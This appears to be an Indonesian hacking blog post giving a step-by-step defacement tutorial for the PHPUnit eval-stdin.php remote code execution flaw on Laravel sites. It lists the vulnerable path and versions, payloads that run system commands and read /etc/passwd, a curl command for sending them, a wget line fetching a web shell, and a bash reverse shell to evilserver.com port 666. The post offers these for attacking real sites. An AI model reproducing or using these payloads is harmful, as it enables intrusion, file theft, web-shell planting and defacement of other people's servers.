Laravel PHPUnit Remote Code Execution


Laravel PHPUnit Remote Code Execution

Hallo jumpa lagi dengan saya Rev, disini saya akan kasih tutorial deface Laravel PHPUnit RCE. Sebenarnya bug ini sudah lama tapi baru kali ini aja bisa buat tutorialnya karena udah lama gk update masalah exploit. Celah ini sebenarnya terletak pada vendor third party yakni PHPUnit, bukan dari Laravelnya...



  • Vuln: eval-stdin.php
  • Full Path Exploit : http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Affected versions : Before 4.8.28 and 5.x before 5.6.3
  Gunakan parameter -d atau –data untuk mengirim payloadnya. Payload yang bisa digunakan:


<?php system('tail /etc/passwd'); ?>
<?php echo php_uname(); ?>
<?php show_source('/etc/passwd'); ?> 
 
Contoh Command
 
curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  

Jika ingin spawn shell bisa ubah ke wudget/diubah ke perintah backconnect

  • wget
<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?> 
  •  Backconnect
<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?> 
 
Lalu di evil server dilisten ke port 666
 
  
Sekian tutorial kali ini
Terima Kasih untuk :
exploit.linuxsec.org

Happy Hacking :)

#Laravel PHPUnit Remote Code Execution
#RCE
#PHPUnit
#Deface

SHARE THIS

Author:

Previous Post
Next Post